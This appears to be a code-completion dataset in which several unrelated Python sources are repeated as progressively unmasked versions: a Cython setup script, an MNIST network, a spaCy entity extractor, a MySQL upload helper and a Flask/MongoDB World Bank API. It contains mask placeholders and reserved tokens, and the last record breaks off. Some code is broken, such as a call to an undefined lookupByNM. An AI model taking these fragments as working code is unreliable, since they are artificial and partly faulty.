cythonize(ext_modules))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
CUR_DIR = os.path.dirname(os.path.abspath(__file__))
SRC_DIR = os.path.join(CUR_DIR, 'src')
TPM_DIR = os.path.join(SRC_DIR, 'tpm')
include_dirs = [SRC_DIR]
src_files = ['pytpm/_tpm.pyx']
library_dirs = [os.path.expanduser('~/lib/tpm')]
libraries = ['tpm']
ext_modules = [Extension('pytpm._tpm', src_files, include_dirs=include_dirs,
library_dirs=library_dirs, libraries=libraries)]
setup(name='pytpm', packages=['pytpm'], package_dir={'pytpm': 'pytpm'},
package_data={'pytpm': ['*.pxd', '*.pyx', '*.pxi']}, ext_modules=
cythonize(ext_modules))
<|reserved_special_token_1|>
import os
from distutils.core import setup
from Cython.Distutils import Extension
from Cython.Build import cythonize
CUR_DIR = os.path.dirname(os.path.abspath(__file__))
SRC_DIR = os.path.join(CUR_DIR, 'src')
TPM_DIR = os.path.join(SRC_DIR, 'tpm')
include_dirs = [SRC_DIR]
src_files = ['pytpm/_tpm.pyx']
library_dirs = [os.path.expanduser('~/lib/tpm')]
libraries = ['tpm']
ext_modules = [Extension('pytpm._tpm', src_files, include_dirs=include_dirs,
library_dirs=library_dirs, libraries=libraries)]
setup(name='pytpm', packages=['pytpm'], package_dir={'pytpm': 'pytpm'},
package_data={'pytpm': ['*.pxd', '*.pyx', '*.pxi']}, ext_modules=
cythonize(ext_modules))
<|reserved_special_token_1|>
import os
from distutils.core import setup
from Cython.Distutils import Extension
from Cython.Build import cythonize
CUR_DIR = os.path.dirname(os.path.abspath(__file__))
SRC_DIR = os.path.join(CUR_DIR, 'src')
TPM_DIR = os.path.join(SRC_DIR, 'tpm')
include_dirs = [SRC_DIR]
src_files = ["pytpm/_tpm.pyx"]
# TPM library and path to the library.
library_dirs = [os.path.expanduser("~/lib/tpm")]
libraries = ['tpm']
ext_modules = [
Extension(
"pytpm._tpm", src_files,
include_dirs=include_dirs,
library_dirs=library_dirs,
libraries=libraries
)
]
setup(
name='pytpm',
packages=['pytpm'],
package_dir={'pytpm': 'pytpm'},
package_data={'pytpm': ['*.pxd', '*.pyx', '*.pxi']},
ext_modules=cythonize(ext_modules)
)
|
flexible
|
{
"blob_id": "3875d85bef37900f9066c108dc720b364cbafffa",
"index": 8476,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsetup(name='pytpm', packages=['pytpm'], package_dir={'pytpm': 'pytpm'},\n package_data={'pytpm': ['*.pxd', '*.pyx', '*.pxi']}, ext_modules=\n cythonize(ext_modules))\n",
"step-3": "<mask token>\nCUR_DIR = os.path.dirname(os.path.abspath(__file__))\nSRC_DIR = os.path.join(CUR_DIR, 'src')\nTPM_DIR = os.path.join(SRC_DIR, 'tpm')\ninclude_dirs = [SRC_DIR]\nsrc_files = ['pytpm/_tpm.pyx']\nlibrary_dirs = [os.path.expanduser('~/lib/tpm')]\nlibraries = ['tpm']\next_modules = [Extension('pytpm._tpm', src_files, include_dirs=include_dirs,\n library_dirs=library_dirs, libraries=libraries)]\nsetup(name='pytpm', packages=['pytpm'], package_dir={'pytpm': 'pytpm'},\n package_data={'pytpm': ['*.pxd', '*.pyx', '*.pxi']}, ext_modules=\n cythonize(ext_modules))\n",
"step-4": "import os\nfrom distutils.core import setup\nfrom Cython.Distutils import Extension\nfrom Cython.Build import cythonize\nCUR_DIR = os.path.dirname(os.path.abspath(__file__))\nSRC_DIR = os.path.join(CUR_DIR, 'src')\nTPM_DIR = os.path.join(SRC_DIR, 'tpm')\ninclude_dirs = [SRC_DIR]\nsrc_files = ['pytpm/_tpm.pyx']\nlibrary_dirs = [os.path.expanduser('~/lib/tpm')]\nlibraries = ['tpm']\next_modules = [Extension('pytpm._tpm', src_files, include_dirs=include_dirs,\n library_dirs=library_dirs, libraries=libraries)]\nsetup(name='pytpm', packages=['pytpm'], package_dir={'pytpm': 'pytpm'},\n package_data={'pytpm': ['*.pxd', '*.pyx', '*.pxi']}, ext_modules=\n cythonize(ext_modules))\n",
"step-5": "import os\nfrom distutils.core import setup\nfrom Cython.Distutils import Extension\nfrom Cython.Build import cythonize\n\nCUR_DIR = os.path.dirname(os.path.abspath(__file__))\nSRC_DIR = os.path.join(CUR_DIR, 'src')\nTPM_DIR = os.path.join(SRC_DIR, 'tpm')\ninclude_dirs = [SRC_DIR]\nsrc_files = [\"pytpm/_tpm.pyx\"]\n\n# TPM library and path to the library.\nlibrary_dirs = [os.path.expanduser(\"~/lib/tpm\")]\nlibraries = ['tpm']\n\next_modules = [\n Extension(\n \"pytpm._tpm\", src_files,\n include_dirs=include_dirs,\n library_dirs=library_dirs,\n libraries=libraries\n )\n]\n\nsetup(\n name='pytpm',\n packages=['pytpm'],\n package_dir={'pytpm': 'pytpm'},\n package_data={'pytpm': ['*.pxd', '*.pyx', '*.pxi']},\n ext_modules=cythonize(ext_modules)\n)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
"""
Implements a Neural Network
"""
from vectorflux import VectorFlux
from mnist import read, show, normalize
from vectorflux.layers import Dense
from vectorflux.layers.Dropout import Dropout
train = list(read('train'))
test = list(read('test'))
print("Train size: {}".format(len(train)))
print("Test size: {}".format(len(test)))
# Normalization for values
test_x, test_y = normalize(test)
train_x, train_y = normalize(train)
vf = VectorFlux()
vf.add(Dense(800, activation='sigmoid', input_shape=784, optimizer='Momentum'))
vf.add(Dropout(0.5, input_shape=800))
vf.add(Dense(800, activation='sigmoid', input_shape=800, optimizer='ADAM'))
vf.add(Dense(10, activation='sigmoid', input_shape=800))
vf.train(x_train = train_x, y_train = train_y, x_test=test_x, y_test = test_y, epochs=100000, alpha=0.001, mini_batch_size=100)
|
normal
|
{
"blob_id": "94d296b5a13bfa59dba5812da31707f9db9080af",
"index": 1292,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('Train size: {}'.format(len(train)))\nprint('Test size: {}'.format(len(test)))\n<mask token>\nvf.add(Dense(800, activation='sigmoid', input_shape=784, optimizer='Momentum'))\nvf.add(Dropout(0.5, input_shape=800))\nvf.add(Dense(800, activation='sigmoid', input_shape=800, optimizer='ADAM'))\nvf.add(Dense(10, activation='sigmoid', input_shape=800))\nvf.train(x_train=train_x, y_train=train_y, x_test=test_x, y_test=test_y,\n epochs=100000, alpha=0.001, mini_batch_size=100)\n",
"step-3": "<mask token>\ntrain = list(read('train'))\ntest = list(read('test'))\nprint('Train size: {}'.format(len(train)))\nprint('Test size: {}'.format(len(test)))\ntest_x, test_y = normalize(test)\ntrain_x, train_y = normalize(train)\nvf = VectorFlux()\nvf.add(Dense(800, activation='sigmoid', input_shape=784, optimizer='Momentum'))\nvf.add(Dropout(0.5, input_shape=800))\nvf.add(Dense(800, activation='sigmoid', input_shape=800, optimizer='ADAM'))\nvf.add(Dense(10, activation='sigmoid', input_shape=800))\nvf.train(x_train=train_x, y_train=train_y, x_test=test_x, y_test=test_y,\n epochs=100000, alpha=0.001, mini_batch_size=100)\n",
"step-4": "<mask token>\nfrom vectorflux import VectorFlux\nfrom mnist import read, show, normalize\nfrom vectorflux.layers import Dense\nfrom vectorflux.layers.Dropout import Dropout\ntrain = list(read('train'))\ntest = list(read('test'))\nprint('Train size: {}'.format(len(train)))\nprint('Test size: {}'.format(len(test)))\ntest_x, test_y = normalize(test)\ntrain_x, train_y = normalize(train)\nvf = VectorFlux()\nvf.add(Dense(800, activation='sigmoid', input_shape=784, optimizer='Momentum'))\nvf.add(Dropout(0.5, input_shape=800))\nvf.add(Dense(800, activation='sigmoid', input_shape=800, optimizer='ADAM'))\nvf.add(Dense(10, activation='sigmoid', input_shape=800))\nvf.train(x_train=train_x, y_train=train_y, x_test=test_x, y_test=test_y,\n epochs=100000, alpha=0.001, mini_batch_size=100)\n",
"step-5": "\"\"\"\nImplements a Neural Network\n\n\"\"\"\nfrom vectorflux import VectorFlux\nfrom mnist import read, show, normalize\n\nfrom vectorflux.layers import Dense\nfrom vectorflux.layers.Dropout import Dropout\n\ntrain = list(read('train'))\ntest = list(read('test'))\n\nprint(\"Train size: {}\".format(len(train)))\nprint(\"Test size: {}\".format(len(test)))\n\n# Normalization for values\ntest_x, test_y = normalize(test)\ntrain_x, train_y = normalize(train)\n\nvf = VectorFlux()\nvf.add(Dense(800, activation='sigmoid', input_shape=784, optimizer='Momentum'))\nvf.add(Dropout(0.5, input_shape=800))\nvf.add(Dense(800, activation='sigmoid', input_shape=800, optimizer='ADAM'))\nvf.add(Dense(10, activation='sigmoid', input_shape=800))\n\nvf.train(x_train = train_x, y_train = train_y, x_test=test_x, y_test = test_y, epochs=100000, alpha=0.001, mini_batch_size=100)\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import enter
import loginout
import roleinfo
import zhanyi
import package
#import matrix
|
normal
|
{
"blob_id": "de665735f02c7569ab382fdc3e910d5d3ac05bb5",
"index": 9088,
"step-1": "<mask token>\n",
"step-2": "import enter\nimport loginout\nimport roleinfo\nimport zhanyi\nimport package\n",
"step-3": "import enter\nimport loginout\nimport roleinfo\nimport zhanyi\nimport package\n#import matrix",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
# uploadops.py
# CS304-Final Project
# Created by: Megan Shum, Maxine Hood, Mina Hattori
#!/usr/local/bin/python2.7
# This file handles all the SQL calls for the upload page.
import sys
import MySQLdb
import dbconn2
def uploadPost(conn, username, description, location, time_stamp, pathname):
'''Inserts post in Posts table'''
curs = conn.cursor(MySQLdb.cursors.DictCursor) # results as Dictionaries
curs.execute('insert into posts(username, description, location, time_stamp, pic) values(%s, %s, %s, %s, %s)', [username, description, location, time_stamp, pathname])
# ================================================================
# This starts the ball rolling, *if* the script is run as a script,
# rather than just being imported.
if __name__ == '__main__':
if len(sys.argv) < 2:
print "Usage: {name} nm".format(name=sys.argv[0])
else:
DSN = dbconn2.read_cnf()
DSN['db'] = 'mmm_db' # the database we want to connect to
dbconn2.connect(DSN)
print lookupByNM(sys.argv[1])
|
normal
|
{
"blob_id": "f0deb8ccaf50ea0abb9e1632eaa4354a4f21dece",
"index": 5794,
"step-1": "# uploadops.py\n# CS304-Final Project\n# Created by: Megan Shum, Maxine Hood, Mina Hattori\n#!/usr/local/bin/python2.7\n# This file handles all the SQL calls for the upload page.\n\nimport sys\nimport MySQLdb\nimport dbconn2\n\ndef uploadPost(conn, username, description, location, time_stamp, pathname):\n '''Inserts post in Posts table'''\n curs = conn.cursor(MySQLdb.cursors.DictCursor) # results as Dictionaries\n curs.execute('insert into posts(username, description, location, time_stamp, pic) values(%s, %s, %s, %s, %s)', [username, description, location, time_stamp, pathname])\n\n# ================================================================\n# This starts the ball rolling, *if* the script is run as a script,\n# rather than just being imported.\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n print \"Usage: {name} nm\".format(name=sys.argv[0])\n else:\n DSN = dbconn2.read_cnf()\n DSN['db'] = 'mmm_db' # the database we want to connect to\n dbconn2.connect(DSN)\n print lookupByNM(sys.argv[1])\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import spacy
nlp = spacy.load("en_core_web_lg")
def find_entities(corpus):
doc = nlp(corpus)
entities = {}
for ent in doc.ents:
entity_type = ent.label_
entity_name = ent.text
values = entities.get(entity_type, set())
values.add(entity_name)
entities[entity_type] = values
return {key: list(val) for key, val in entities.items()}
|
normal
|
{
"blob_id": "3a0bf031b76d2df03cdb5b37861cb8942307709c",
"index": 7601,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef find_entities(corpus):\n doc = nlp(corpus)\n entities = {}\n for ent in doc.ents:\n entity_type = ent.label_\n entity_name = ent.text\n values = entities.get(entity_type, set())\n values.add(entity_name)\n entities[entity_type] = values\n return {key: list(val) for key, val in entities.items()}\n",
"step-3": "<mask token>\nnlp = spacy.load('en_core_web_lg')\n\n\ndef find_entities(corpus):\n doc = nlp(corpus)\n entities = {}\n for ent in doc.ents:\n entity_type = ent.label_\n entity_name = ent.text\n values = entities.get(entity_type, set())\n values.add(entity_name)\n entities[entity_type] = values\n return {key: list(val) for key, val in entities.items()}\n",
"step-4": "import spacy\nnlp = spacy.load('en_core_web_lg')\n\n\ndef find_entities(corpus):\n doc = nlp(corpus)\n entities = {}\n for ent in doc.ents:\n entity_type = ent.label_\n entity_name = ent.text\n values = entities.get(entity_type, set())\n values.add(entity_name)\n entities[entity_type] = values\n return {key: list(val) for key, val in entities.items()}\n",
"step-5": "import spacy\n\nnlp = spacy.load(\"en_core_web_lg\")\n\n\ndef find_entities(corpus):\n doc = nlp(corpus)\n entities = {}\n\n for ent in doc.ents:\n entity_type = ent.label_\n entity_name = ent.text\n\n values = entities.get(entity_type, set())\n values.add(entity_name)\n entities[entity_type] = values\n\n return {key: list(val) for key, val in entities.items()}\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
@api.route(f'/{COLLECTION}/<collection_id>', endpoint=f'{COLLECTION}_by_id')
@api.param('collection_id', f'Unique id, used to distinguish {COLLECTION}.')
class CollectionsById(Resource):
@api.doc(description='[Q2] Deleting a collection with the data service.')
@api.response(200, 'Successfully removed collection.')
@api.response(404, 'Unable to find collection.')
@api.response(400, 'Unable to remove collection.')
def delete(self, collection_id):
if not db[COLLECTION].find_one({'_id': ObjectId(collection_id)}):
return {'message': 'Unable to find collection.'}, 404
try:
db[COLLECTION].delete_one({'_id': ObjectId(collection_id)})
except:
return {'message': 'Unable to remove collection.'}, 400
return {'message':
f'Collection = {collection_id} has been removed from the database!'
}, 200
@api.doc(description='[Q4] Retrieve a collection.')
@api.response(200, 'Successfully retreived collection.')
@api.response(404, 'Unable to retreive collection.')
def get(self, collection_id):
try:
collection = db[COLLECTION].find_one({'_id': ObjectId(
collection_id)})
except:
return {'message': 'Unable to find collection'}, 404
return {'collection_id': str(collection['_id']), 'indicator':
collection['indicator'], 'indicator_value': collection[
'indicator_value'], 'creation_time': str(collection[
'creation_time']), 'entries': collection['entries']}, 200
@api.route(f'/{COLLECTION}/<collection_id>/<year>/<country>', endpoint=
f'{COLLECTION}_countrydate')
@api.param('collection_id', f'Unique id, used to distinguish {COLLECTION}.')
@api.param('year', 'Year ranging from 2012 to 2017.')
@api.param('country', 'Country identifier (eg. Arab World)')
class CollectionByCountryYear(Resource):
@api.doc(description=
'[Q5] Retrieve economic indicator value for given a country and year.')
@api.response(200,
'Successfully retrieved economic indicator for given a country and year.'
)
@api.response(400, 'Unable to retrieve indicator entry.')
@api.response(404, 'Unable to find collection.')
def get(self, collection_id, year, country):
try:
collection = db[COLLECTION].find_one({'_id': ObjectId(
collection_id)})
except:
return {'message': 'Unable to find collection'}, 404
filtered_entries = [entry for entry in collection['entries'] if
entry['country'] == country and entry['date'] == year]
if len(filtered_entries) == 0:
return {'message':
f"Unable to find specific indicator entry for country='{country}' and year='{year}'."
}, 400
return {'collection_id': str(collection['_id']), 'indicator':
collection['indicator'], **filtered_entries[0]}, 200
@api.route(f'/{COLLECTION}/<collection_id>/<year>', endpoint=
f'{COLLECTION}_by_top_bottom')
@api.param('collection_id', f'Unique id, used to distinguish {COLLECTION}.')
@api.param('year', 'Year ranging from 2012 to 2017.')
class CollectionByTopBottom(Resource):
@api.doc(description=
'[Q6] Retrieve top/bottom economic indicator values for a given year.')
@api.response(200, 'Successfully retreived economic indicator values.')
@api.response(404, 'Unable to find collection.')
@api.expect(parser)
def get(self, collection_id, year):
query = request.args.get('q')
try:
collection = db[COLLECTION].find_one({'_id': ObjectId(
collection_id)})
except:
return {'message': 'Unable to find collection'}, 404
filtered_entries = [entry for entry in collection['entries'] if
entry['date'] == year]
if not query:
return {'indicator': collection['indicator'], 'indicator_value':
collection['indicator_value'], 'entries': filtered_entries
}, 200
return {'indicator': collection['indicator'], 'indicator_value':
collection['indicator_value'], 'entries': sorted(
filtered_entries, key=lambda k: k['value'], reverse=True)[
query_to_index(query, len(filtered_entries))]}, 200
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_indicator_data(indicator, page=1, prevRes=[], max_pages=MAX_PAGE_LIMIT
):
response = requests.get(api_url(indicator=indicator, page=page)).json()
if not indicator or len(response) <= 1 and response[0]['message'][0]['key'
] == 'Invalid value':
return 'Invalid indicator'
if response[0]['page'] >= max_pages or response[0]['page'] == response[0][
'pages']:
return prevRes + response[1]
return get_indicator_data(indicator=indicator, page=response[0]['page'] +
1, prevRes=prevRes + response[1], max_pages=max_pages)
<|reserved_special_token_0|>
@api.route(f'/{COLLECTION}', endpoint=COLLECTION)
class CollectionIndex(Resource):
@api.doc(description='[Q1] Import a collection from the data service.')
@api.response(200, 'Successfully retrieved collection.')
@api.response(201, 'Successfully created collection.')
@api.response(400, 'Unable to create / retrieve collection.')
@api.expect(indicator_model)
def post(self):
body = request.json
if not body['indicator_id']:
return {'message': 'Please specify an indicator.'}, 400
existing_collection = db[COLLECTION].find_one({'indicator': body[
'indicator_id']})
if existing_collection:
return {'location':
f"/{COLLECTION}/{str(existing_collection['_id'])}",
'collection_id': str(existing_collection['_id']),
'creation_time': str(existing_collection['creation_time']),
'indicator': existing_collection['indicator']}, 200
indicator_data = get_indicator_data(body['indicator_id'])
if indicator_data == 'Invalid indicator':
return {'message': 'Please specify a valid indicator.'}, 400
collection = {'indicator': indicator_data[0]['indicator']['id'],
'indicator_value': indicator_data[0]['indicator']['value'],
'creation_time': datetime.datetime.utcnow(), 'entries': [
format_collection_entry(entry) for entry in indicator_data]}
created_collection = db[COLLECTION].insert_one(collection)
return {'location':
f'/{COLLECTION}/{str(created_collection.inserted_id)}',
'collection_id': str(created_collection.inserted_id),
'creation_time': str(collection['creation_time']), 'indicator':
collection['indicator']}, 201
@api.doc(description='[Q3] Retrieve the list of available collections.')
@api.response(200, 'Successfully retreieved collections.')
@api.response(400, 'Unable to retreive collections.')
def get(self):
try:
collections = db[COLLECTION].find()
except:
return {'message': 'Unable to retrieve collections.'}, 400
return [{'location': f"/{COLLECTION}/{str(doc['_id'])}",
'collection_id': str(doc['_id']), 'creation_time': str(doc[
'creation_time']), 'indicator': doc['indicator']} for doc in
collections], 200
@api.route(f'/{COLLECTION}/<collection_id>', endpoint=f'{COLLECTION}_by_id')
@api.param('collection_id', f'Unique id, used to distinguish {COLLECTION}.')
class CollectionsById(Resource):
@api.doc(description='[Q2] Deleting a collection with the data service.')
@api.response(200, 'Successfully removed collection.')
@api.response(404, 'Unable to find collection.')
@api.response(400, 'Unable to remove collection.')
def delete(self, collection_id):
if not db[COLLECTION].find_one({'_id': ObjectId(collection_id)}):
return {'message': 'Unable to find collection.'}, 404
try:
db[COLLECTION].delete_one({'_id': ObjectId(collection_id)})
except:
return {'message': 'Unable to remove collection.'}, 400
return {'message':
f'Collection = {collection_id} has been removed from the database!'
}, 200
@api.doc(description='[Q4] Retrieve a collection.')
@api.response(200, 'Successfully retreived collection.')
@api.response(404, 'Unable to retreive collection.')
def get(self, collection_id):
try:
collection = db[COLLECTION].find_one({'_id': ObjectId(
collection_id)})
except:
return {'message': 'Unable to find collection'}, 404
return {'collection_id': str(collection['_id']), 'indicator':
collection['indicator'], 'indicator_value': collection[
'indicator_value'], 'creation_time': str(collection[
'creation_time']), 'entries': collection['entries']}, 200
@api.route(f'/{COLLECTION}/<collection_id>/<year>/<country>', endpoint=
f'{COLLECTION}_countrydate')
@api.param('collection_id', f'Unique id, used to distinguish {COLLECTION}.')
@api.param('year', 'Year ranging from 2012 to 2017.')
@api.param('country', 'Country identifier (eg. Arab World)')
class CollectionByCountryYear(Resource):
@api.doc(description=
'[Q5] Retrieve economic indicator value for given a country and year.')
@api.response(200,
'Successfully retrieved economic indicator for given a country and year.'
)
@api.response(400, 'Unable to retrieve indicator entry.')
@api.response(404, 'Unable to find collection.')
def get(self, collection_id, year, country):
try:
collection = db[COLLECTION].find_one({'_id': ObjectId(
collection_id)})
except:
return {'message': 'Unable to find collection'}, 404
filtered_entries = [entry for entry in collection['entries'] if
entry['country'] == country and entry['date'] == year]
if len(filtered_entries) == 0:
return {'message':
f"Unable to find specific indicator entry for country='{country}' and year='{year}'."
}, 400
return {'collection_id': str(collection['_id']), 'indicator':
collection['indicator'], **filtered_entries[0]}, 200
@api.route(f'/{COLLECTION}/<collection_id>/<year>', endpoint=
f'{COLLECTION}_by_top_bottom')
@api.param('collection_id', f'Unique id, used to distinguish {COLLECTION}.')
@api.param('year', 'Year ranging from 2012 to 2017.')
class CollectionByTopBottom(Resource):
@api.doc(description=
'[Q6] Retrieve top/bottom economic indicator values for a given year.')
@api.response(200, 'Successfully retreived economic indicator values.')
@api.response(404, 'Unable to find collection.')
@api.expect(parser)
def get(self, collection_id, year):
query = request.args.get('q')
try:
collection = db[COLLECTION].find_one({'_id': ObjectId(
collection_id)})
except:
return {'message': 'Unable to find collection'}, 404
filtered_entries = [entry for entry in collection['entries'] if
entry['date'] == year]
if not query:
return {'indicator': collection['indicator'], 'indicator_value':
collection['indicator_value'], 'entries': filtered_entries
}, 200
return {'indicator': collection['indicator'], 'indicator_value':
collection['indicator_value'], 'entries': sorted(
filtered_entries, key=lambda k: k['value'], reverse=True)[
query_to_index(query, len(filtered_entries))]}, 200
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def mlab_client(dbuser, dbpassword, mlab_inst, dbname):
return MongoClient(
f'mongodb://{dbuser}:{dbpassword}@{mlab_inst}.mlab.com:39071/{dbname}'
)[dbname]
def api_url(indicator, date='2012:2017', fmt='json', page=1):
return (
f'http://api.worldbank.org/v2/countries/all/indicators/{indicator}?date={date}&format={fmt}&page={page}'
)
def get_indicator_data(indicator, page=1, prevRes=[], max_pages=MAX_PAGE_LIMIT
):
response = requests.get(api_url(indicator=indicator, page=page)).json()
if not indicator or len(response) <= 1 and response[0]['message'][0]['key'
] == 'Invalid value':
return 'Invalid indicator'
if response[0]['page'] >= max_pages or response[0]['page'] == response[0][
'pages']:
return prevRes + response[1]
return get_indicator_data(indicator=indicator, page=response[0]['page'] +
1, prevRes=prevRes + response[1], max_pages=max_pages)
def format_collection_entry(indicator_data):
return {'country': indicator_data['country']['value'], 'date':
indicator_data['date'], 'value': indicator_data['value']}
def query_to_index(query, arr_size):
try:
match = re.search('^(bottom|top)\\d+$', query).group()
order = re.search('^(bottom|top)', match).group()
length = int(re.search('\\d+$', match).group())
if order == 'top':
return slice(length)
elif order == 'bottom':
return slice(arr_size - length, arr_size)
else:
return slice(arr_size)
except:
return slice(arr_size)
@api.route(f'/{COLLECTION}', endpoint=COLLECTION)
class CollectionIndex(Resource):
@api.doc(description='[Q1] Import a collection from the data service.')
@api.response(200, 'Successfully retrieved collection.')
@api.response(201, 'Successfully created collection.')
@api.response(400, 'Unable to create / retrieve collection.')
@api.expect(indicator_model)
def post(self):
body = request.json
if not body['indicator_id']:
return {'message': 'Please specify an indicator.'}, 400
existing_collection = db[COLLECTION].find_one({'indicator': body[
'indicator_id']})
if existing_collection:
return {'location':
f"/{COLLECTION}/{str(existing_collection['_id'])}",
'collection_id': str(existing_collection['_id']),
'creation_time': str(existing_collection['creation_time']),
'indicator': existing_collection['indicator']}, 200
indicator_data = get_indicator_data(body['indicator_id'])
if indicator_data == 'Invalid indicator':
return {'message': 'Please specify a valid indicator.'}, 400
collection = {'indicator': indicator_data[0]['indicator']['id'],
'indicator_value': indicator_data[0]['indicator']['value'],
'creation_time': datetime.datetime.utcnow(), 'entries': [
format_collection_entry(entry) for entry in indicator_data]}
created_collection = db[COLLECTION].insert_one(collection)
return {'location':
f'/{COLLECTION}/{str(created_collection.inserted_id)}',
'collection_id': str(created_collection.inserted_id),
'creation_time': str(collection['creation_time']), 'indicator':
collection['indicator']}, 201
@api.doc(description='[Q3] Retrieve the list of available collections.')
@api.response(200, 'Successfully retreieved collections.')
@api.response(400, 'Unable to retreive collections.')
def get(self):
try:
collections = db[COLLECTION].find()
except:
return {'message': 'Unable to retrieve collections.'}, 400
return [{'location': f"/{COLLECTION}/{str(doc['_id'])}",
'collection_id': str(doc['_id']), 'creation_time': str(doc[
'creation_time']), 'indicator': doc['indicator']} for doc in
collections], 200
@api.route(f'/{COLLECTION}/<collection_id>', endpoint=f'{COLLECTION}_by_id')
@api.param('collection_id', f'Unique id, used to distinguish {COLLECTION}.')
class CollectionsById(Resource):
@api.doc(description='[Q2] Deleting a collection with the data service.')
@api.response(200, 'Successfully removed collection.')
@api.response(404, 'Unable to find collection.')
@api.response(400, 'Unable to remove collection.')
def delete(self, collection_id):
if not db[COLLECTION].find_one({'_id': ObjectId(collection_id)}):
return {'message': 'Unable to find collection.'}, 404
try:
db[COLLECTION].delete_one({'_id': ObjectId(collection_id)})
except:
return {'message': 'Unable to remove collection.'}, 400
return {'message':
f'Collection = {collection_id} has been removed from the database!'
}, 200
@api.doc(description='[Q4] Retrieve a collection.')
@api.response(200, 'Successfully retreived collection.')
@api.response(404, 'Unable to retreive collection.')
def get(self, collection_id):
try:
collection = db[COLLECTION].find_one({'_id': ObjectId(
collection_id)})
except:
return {'message': 'Unable to find collection'}, 404
return {'collection_id': str(collection['_id']), 'indicator':
collection['indicator'], 'indicator_value': collection[
'indicator_value'], 'creation_time': str(collection[
'creation_time']), 'entries': collection['entries']}, 200
@api.route(f'/{COLLECTION}/<collection_id>/<year>/<country>', endpoint=
f'{COLLECTION}_countrydate')
@api.param('collection_id', f'Unique id, used to distinguish {COLLECTION}.')
@api.param('year', 'Year ranging from 2012 to 2017.')
@api.param('country', 'Country identifier (eg. Arab World)')
class CollectionByCountryYear(Resource):
@api.doc(description=
'[Q5] Retrieve economic indicator value for given a country and year.')
@api.response(200,
'Successfully retrieved economic indicator for given a country and year.'
)
@api.response(400, 'Unable to retrieve indicator entry.')
@api.response(404, 'Unable to find collection.')
def get(self, collection_id, year, country):
try:
collection = db[COLLECTION].find_one({'_id': ObjectId(
collection_id)})
except:
return {'message': 'Unable to find collection'}, 404
filtered_entries = [entry for entry in collection['entries'] if
entry['country'] == country and entry['date'] == year]
if len(filtered_entries) == 0:
return {'message':
f"Unable to find specific indicator entry for country='{country}' and year='{year}'."
}, 400
return {'collection_id': str(collection['_id']), 'indicator':
collection['indicator'], **filtered_entries[0]}, 200
@api.route(f'/{COLLECTION}/<collection_id>/<year>', endpoint=
f'{COLLECTION}_by_top_bottom')
@api.param('collection_id', f'Unique id, used to distinguish {COLLECTION}.')
@api.param('year', 'Year ranging from 2012 to 2017.')
class CollectionByTopBottom(Resource):
@api.doc(description=
'[Q6] Retrieve top/bottom economic indicator values for a given year.')
@api.response(200, 'Successfully retreived economic indicator values.')
@api.response(404, 'Unable to find collection.')
@api.expect(parser)
def get(self, collection_id, year):
query = request.args.get('q')
try:
collection = db[COLLECTION].find_one({'_id': ObjectId(
collection_id)})
except:
return {'message': 'Unable to find collection'}, 404
filtered_entries = [entry for entry in collection['entries'] if
entry['date'] == year]
if not query:
return {'indicator': collection['indicator'], 'indicator_value':
collection['indicator_value'], 'entries': filtered_entries
}, 200
return {'indicator': collection['indicator'], 'indicator_value':
collection['indicator_value'], 'entries': sorted(
filtered_entries, key=lambda k: k['value'], reverse=True)[
query_to_index(query, len(filtered_entries))]}, 200
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
parser.add_argument('q', help=
'Query param. Expected format: top<k> / bottom<k>, where k is between 1 and 100. Eg. top10, bottom40'
)
def mlab_client(dbuser, dbpassword, mlab_inst, dbname):
return MongoClient(
f'mongodb://{dbuser}:{dbpassword}@{mlab_inst}.mlab.com:39071/{dbname}'
)[dbname]
def api_url(indicator, date='2012:2017', fmt='json', page=1):
return (
f'http://api.worldbank.org/v2/countries/all/indicators/{indicator}?date={date}&format={fmt}&page={page}'
)
def get_indicator_data(indicator, page=1, prevRes=[], max_pages=MAX_PAGE_LIMIT
):
response = requests.get(api_url(indicator=indicator, page=page)).json()
if not indicator or len(response) <= 1 and response[0]['message'][0]['key'
] == 'Invalid value':
return 'Invalid indicator'
if response[0]['page'] >= max_pages or response[0]['page'] == response[0][
'pages']:
return prevRes + response[1]
return get_indicator_data(indicator=indicator, page=response[0]['page'] +
1, prevRes=prevRes + response[1], max_pages=max_pages)
def format_collection_entry(indicator_data):
return {'country': indicator_data['country']['value'], 'date':
indicator_data['date'], 'value': indicator_data['value']}
def query_to_index(query, arr_size):
try:
match = re.search('^(bottom|top)\\d+$', query).group()
order = re.search('^(bottom|top)', match).group()
length = int(re.search('\\d+$', match).group())
if order == 'top':
return slice(length)
elif order == 'bottom':
return slice(arr_size - length, arr_size)
else:
return slice(arr_size)
except:
return slice(arr_size)
@api.route(f'/{COLLECTION}', endpoint=COLLECTION)
class CollectionIndex(Resource):
@api.doc(description='[Q1] Import a collection from the data service.')
@api.response(200, 'Successfully retrieved collection.')
@api.response(201, 'Successfully created collection.')
@api.response(400, 'Unable to create / retrieve collection.')
@api.expect(indicator_model)
def post(self):
body = request.json
if not body['indicator_id']:
return {'message': 'Please specify an indicator.'}, 400
existing_collection = db[COLLECTION].find_one({'indicator': body[
'indicator_id']})
if existing_collection:
return {'location':
f"/{COLLECTION}/{str(existing_collection['_id'])}",
'collection_id': str(existing_collection['_id']),
'creation_time': str(existing_collection['creation_time']),
'indicator': existing_collection['indicator']}, 200
indicator_data = get_indicator_data(body['indicator_id'])
if indicator_data == 'Invalid indicator':
return {'message': 'Please specify a valid indicator.'}, 400
collection = {'indicator': indicator_data[0]['indicator']['id'],
'indicator_value': indicator_data[0]['indicator']['value'],
'creation_time': datetime.datetime.utcnow(), 'entries': [
format_collection_entry(entry) for entry in indicator_data]}
